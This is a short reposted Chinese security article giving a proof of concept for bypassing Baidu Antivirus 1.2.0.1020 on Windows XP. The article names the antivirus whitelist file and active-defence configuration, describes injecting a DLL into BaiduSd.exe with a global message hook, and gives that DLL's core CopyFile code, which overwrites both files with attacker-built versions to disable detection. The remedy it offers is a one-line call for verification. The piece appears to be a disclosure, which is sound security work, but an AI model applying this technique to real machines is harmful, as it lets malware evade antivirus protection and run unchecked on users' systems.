2345技术员联盟

应用层全面绕过百度杀毒任意执行代码及修复方案(poc)

测试版本:百度杀毒1.2.0.1020

测试系统环境:winxp sp3
 
腾讯一样的,只是百度2个文件都保护了.
 
//这个文件是杀毒白名单,免杀就往这加
 
C:\Documents and Settings\All Users\Application Data\baidu\baidusd\white_list.db
 
//这个是主动防御
 
C:\Documents and Settings\All Users\Application Data\baidu\baidusd\Config\900.dat
 
虽然都保护了但有个地方百度疏忽了,见POC
 
1.先本地构造好white_list.db和900.dat放到C盘
 
2.编写一个简单的全局消息注入程序,将test.dll注入到BaiduSd.exe绕过保护修改文件
 
以下为test.dll核心代码
 
CopyFile(_T("C:\\white_list.db"),_T("C:\\Documents and Settings\\All Users\\Application Data\\baidu\\baidusd\\white_list.db"),FALSE);
CopyFile(_T("C:\\900.dat"),_T("C:\\Documents and Settings\\All Users\\Application Data\\baidu\\baidusd\\Config\\900.dat"),FALSE);

 
修复方案:
校验啊校验 

相关文章

本文来自电脑技术网www.it892.com),转载本文请注明来源.
本文链接:http://www.it892.com/content/security/information/20131019/4956.html
热点排行
无觅相关文章插件,快速提升流量